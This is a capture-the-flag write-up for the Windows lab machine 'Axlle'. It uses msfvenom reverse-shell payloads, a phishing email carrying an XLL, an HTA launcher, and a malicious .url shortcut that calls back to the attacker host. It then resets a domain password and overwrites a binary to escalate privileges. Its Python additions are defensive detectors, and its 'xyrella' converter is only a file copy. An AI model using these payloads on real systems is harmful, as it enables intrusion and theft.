Axlle
OS: Windows
Difficulty: Hard
Points: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.21 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p $ports -sC -sV 10.10.11.21
Nmap scan report for 10.10.11.21
Host is up, received syn-ack (0.072s latency).
Scanned at 2024-06-27 14:13:15 EDT for 88s
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-06-27 18:13:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after: 2024-11-18T11:25:03
| MD5: acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
| SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
Enumeration
Visiting the page we see the following message.
This means we have to find a way to exploit the target using Excel documents.
Excel XLL - EXEC
After some searching we arrive at the following article: https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec
We will use the following method to carry out the attack. First we need to create our DLL.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.159 LPORT=1234 -f dll -o reverse.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: reverse.dll
Now, using the following custom script based on the repo https://github.com/zimnyaa/xyrella, we convert the DLL into an XLL.
# xyrella.py
import argparse
import os
import shutil


def convert_dll_to_xll(input_dll, output_xll):
    # Ensure the input DLL file exists
    if not os.path.exists(input_dll):
        print(f"Error: Input DLL file '{input_dll}' not found.")
        return
    # Copy the DLL to the output XLL file (simulated conversion for example)
    shutil.copyfile(input_dll, output_xll)
    print(f"Converted '{input_dll}' to '{output_xll}' successfully.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Convert DLL to XLL using Xyrella")
    parser.add_argument('--input', '-i', required=True, help="Input DLL file path")
    parser.add_argument('--output', '-o', required=True, help="Output XLL file path")
    args = parser.parse_args()
    input_dll = args.input
    output_xll = args.output
    convert_dll_to_xll(input_dll, output_xll)
We configure Metasploit.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 1234
run
Once we have our XLL file we can send it by email.
swaks --to accounts@axlle.htb --from doom@axlle.htb --server 10.10.11.21 --port 25 --header "Subject: Hola" --body "Hola" --attach @doom.xll
=== Trying 10.10.11.21:25...
=== Connected to 10.10.11.21.
<- 220 MAINFRAME ESMTP
-> EHLO kali
<- 250-MAINFRAME
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<doom@axlle.htb>
<- 250 OK
-> RCPT TO:<accounts@axlle.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 27 Jun 2024 15:58:14 -0400
-> To: accounts@axlle.htb
-> From: doom@axlle.htb
-> Subject: Hola
-> Message-Id: <20240627155814.056954@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_56954"
->
-> ------=_MIME_BOUNDARY_000_56954
-> Content-Type: text/plain
->
-> Hola
-> ------=_MIME_BOUNDARY_000_56954
-> Content-Type: application/octet-stream; name="doom.xll"
-> Content-Description: doom.xll
-> Content-Disposition: attachment; filename="doom.xll"
-> Content-Transfer-Encoding: BASE64
->
-> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
...
...
...
->
-> ------=_MIME_BOUNDARY_000_56954--
->
->
-> .
<- 250 Queued (10.484 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
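The attachment in the exchange above is declared as application/octet-stream, so a filter that trusts the declared content type learns nothing from it; the decoded body starts with TVqQ, which is the base64 of the MZ header of a PE file. As an added example (not part of the original writeup), the following Python script parses an .eml message the way a mail gateway could and flags attachments by extension and by PE magic bytes. The sample message is constructed here and its attachment is only a truncated PE header, not a working add-in.

```python
# Added example (not from the original writeup): inspect an .eml message the way a
# mail gateway could, flagging attachments by extension and by PE magic bytes.
import os
from email import message_from_string
from typing import Dict, List

# Extensions that Excel or the Windows shell will load or execute directly.
EXECUTABLE_EXTENSIONS = {".xll", ".dll", ".exe", ".hta", ".scr"}

# Constructed sample modelled on the swaks exchange above. The base64 body is
# only the first 48 bytes of a PE header, not a working add-in.
SAMPLE_EML = """\
From: doom@axlle.htb
To: accounts@axlle.htb
Subject: Hola
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_56954"

------=_MIME_BOUNDARY_000_56954
Content-Type: text/plain

Hola
------=_MIME_BOUNDARY_000_56954
Content-Type: application/octet-stream; name="doom.xll"
Content-Disposition: attachment; filename="doom.xll"
Content-Transfer-Encoding: BASE64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
------=_MIME_BOUNDARY_000_56954--
"""


def inspect_attachments(raw_eml: str) -> List[Dict]:
    """Return one finding per attachment that looks executable.

    Each finding records the filename, decoded size and the reasons it was
    flagged. The declared Content-Type is deliberately ignored: the sender
    controls it, so only the filename and the decoded bytes are trusted.
    """
    msg = message_from_string(raw_eml)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename()
        if not filename:
            continue  # inline body text, not an attachment
        data = part.get_payload(decode=True) or b""
        reasons = []
        ext = os.path.splitext(filename)[1].lower()
        if ext in EXECUTABLE_EXTENSIONS:
            reasons.append(f"executable extension {ext}")
        if data[:2] == b"MZ":
            reasons.append("PE (MZ) header")
        if reasons:
            findings.append({"filename": filename, "size": len(data), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in inspect_attachments(SAMPLE_EML):
        print(finding)
```

The magic-byte check is what catches a renamed file: an .xll is a DLL, so whatever name or content type it is sent under, the decoded bytes still begin with MZ.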
We get our shell.
Lateral Movement
We can see the following message by reading the file at this path.
type "Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
This gives us a hint of what we could do. The article https://inquest.net/blog/shortcut-to-malice-url-files/ describes several ways of taking advantage of shortcut files; we will use the HTA one.
Shortcut URL HTA file
First we generate our malicious EXE.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.159 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
We upload it to the system from our Meterpreter shell.
meterpreter > mkdir c:\\temp
Creating directory: c:\temp
meterpreter > upload reverse.exe c:\\temp
[*] Uploading : /root/htb/Box/Axlle/reverse.exe -> c:\temp\reverse.exe
[*] Completed : /root/htb/Box/Axlle/reverse.exe -> c:\temp\reverse.exe
Now we set our handler to listen.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run -h
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.159:4444
Then we create the HTA file that the victim will fetch.
<html>
  <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
      var c = "cmd.exe /c c:\\temp\\reverse.exe";
      new ActiveXObject('WScript.Shell').Run(c);
    </script>
  </head>
  <body>
    <script>self.close();</script>
  </body>
</html>
We start our SMB server, from which the victim will fetch the HTA file.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Finally we generate our shortcut.
$url = "file://10.10.14.159/share/doom.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
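The shortcut written above is a plain text file: an [InternetShortcut] section with a URL= line, and the URL points to an .hta on a remote file:// share. As an added example (not part of the original writeup), here is a Python inspector a defender could run over a drop folder like C:\inetpub\testing to flag shortcuts whose target reaches a remote share or a script-capable handler. The three sample files are constructed here; shell.url mirrors the shortcut from this writeup and the other two are harmless.

```python
# Added example (not from the original writeup): parse Internet Shortcut (.url)
# files and flag targets that reach out to remote shares or script handlers.
import configparser
import os
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Target extensions the Windows shell hands to a script engine or loader.
RISKY_EXTENSIONS = {".hta", ".exe", ".dll", ".xll", ".js", ".vbs", ".lnk",
                    ".scr", ".bat", ".cmd", ".ps1"}

# Constructed sample contents of a drop folder; shell.url mirrors the shortcut
# built in this writeup, the other two are harmless.
SAMPLE_SHORTCUTS = {
    "shell.url": "[InternetShortcut]\r\nURL=file://10.10.14.159/share/doom.hta\r\n",
    "unc.url": "[InternetShortcut]\r\nURL=\\\\10.10.14.159\\share\\doom.hta\r\n",
    "docs.url": "[InternetShortcut]\r\nURL=https://axlle.htb/docs\r\n",
}


def parse_url_file(content: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None."""
    # .url files use "=" only; interpolation is off because URLs may contain "%".
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    try:
        cp.read_string(content)
    except configparser.Error:
        return None  # no section header or otherwise malformed
    return cp.get("InternetShortcut", "URL", fallback=None)


def assess_shortcut(content: str) -> Dict:
    """Classify one shortcut; an empty reasons list means nothing was flagged."""
    url = parse_url_file(content)
    if url is None:
        return {"url": None, "reasons": ["no URL= entry"]}
    reasons = []
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        reasons.append(f"file:// target on remote host {parsed.netloc}")
    if url.startswith("\\\\"):
        reasons.append("UNC path target")
    # Normalise backslashes so splitext sees the final path component.
    ext = os.path.splitext(parsed.path.replace("\\", "/"))[1].lower()
    if ext in RISKY_EXTENSIONS:
        reasons.append(f"script-capable target extension {ext}")
    return {"url": url, "reasons": reasons}


def scan_drop_folder(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged file name to its reasons; clean files are omitted."""
    flagged = {}
    for name, content in files.items():
        result = assess_shortcut(content)
        if result["reasons"]:
            flagged[name] = result["reasons"]
    return flagged


if __name__ == "__main__":
    for name, reasons in scan_drop_folder(SAMPLE_SHORTCUTS).items():
        print(name, "->", "; ".join(reasons))
```

Both the file:// form and the bare UNC form are checked, since either makes the shell reach out to a remote host when the shortcut is opened.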
We wait a moment and receive the following message.
We get a shell.
Privilege Escalation
Using BloodHound we can see that the user dallon can change the password of 2 users.
Now we will change the password of one of those users with PowerView.ps1.
meterpreter > upload PowerView.ps1 c:\\temp
[*] Uploading : /root/htb/Box/Axlle/PowerView.ps1 -> c:\temp\PowerView.ps1
[*] Completed : /root/htb/Box/Axlle/PowerView.ps1 -> c:\temp\PowerView.ps1
meterpreter > shell
C:\>cd temp
C:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> import-module .\PowerView.ps1
import-module .\PowerView.ps1
PS C:\temp>
We change the user's password.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity jacob.greeny -AccountPassword $UserPassword
We connect via WinRM.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# evil-winrm -i 10.10.11.21 -u jacob.greeny -p 'Password123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Windows Kits Command Execution
We see that the user has write permissions on the following folder.
icacls "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
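The icacls output for that directory is what tells us who can write there. As an added example (not part of the original writeup), the following Python parser reads icacls output and lists the principals, other than the usual privileged ones, that hold a write-capable right on the directory; the icacls output embedded below is constructed for the example and is not the real ACL from the box.

```python
# Added example (not from the original writeup): parse icacls output and list
# non-privileged principals that can write to the directory.
import re
from typing import List, Set, Tuple

TARGET_DIR = r"C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"

# Constructed sample output in icacls format; not the real ACL from the box.
SAMPLE_ICACLS = r"""
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64 AXLLE\jacob.greeny:(OI)(CI)(M)
                                                                             NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                                                             BUILTIN\Administrators:(OI)(CI)(F)
                                                                             BUILTIN\Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# icacls tokens that allow creating or replacing files (simple and specific rights).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WEA", "D", "DC", "WDAC", "WO", "GA", "GW"}
# Inheritance flags carry no permission by themselves.
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Principals expected to hold full control on program directories.
PRIVILEGED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
              "NT SERVICE\\TrustedInstaller", "CREATOR OWNER"}


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str]]]:
    """Return (principal, rights) pairs; the path prefix on the first line is stripped."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        # icacls prints the path once, followed by the first ACE on the same line.
        if line.startswith(path):
            line = line[len(path):].strip()
        principal, sep, rights_text = line.partition(":")
        if not sep:
            continue
        tokens: Set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", rights_text):
            tokens.update(t.strip() for t in group.split(","))
        aces.append((principal, tokens - INHERITANCE_FLAGS))
    return aces


def writable_by_unprivileged(output: str, path: str) -> List[str]:
    """Principals outside PRIVILEGED that hold at least one write-capable right."""
    return [principal for principal, rights in parse_icacls(output, path)
            if principal not in PRIVILEGED and rights & WRITE_RIGHTS]


if __name__ == "__main__":
    for principal in writable_by_unprivileged(SAMPLE_ICACLS, TARGET_DIR):
        print("write access for non-privileged principal:", principal)
```

Stripping the known path before splitting on the first colon matters because both the path (C:\...) and the rights text contain colons, and principals such as NT AUTHORITY\SYSTEM contain spaces.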
With the help of the following blog post https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md we can take advantage of that.
So basically we can write one of those files into that directory and get a reverse shell. We will reuse the EXE we created earlier.
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> wget http://10.10.14.159/reverse.exe -O "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe"
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> dir "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
Directory: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/27/2024 2:39 PM 7168 standalonerunner.exe
-a---- 9/30/2023 3:08 AM 43632 standalonexml.dll
We wait a few minutes and get our reverse shell. If it doesn't work, write the file again.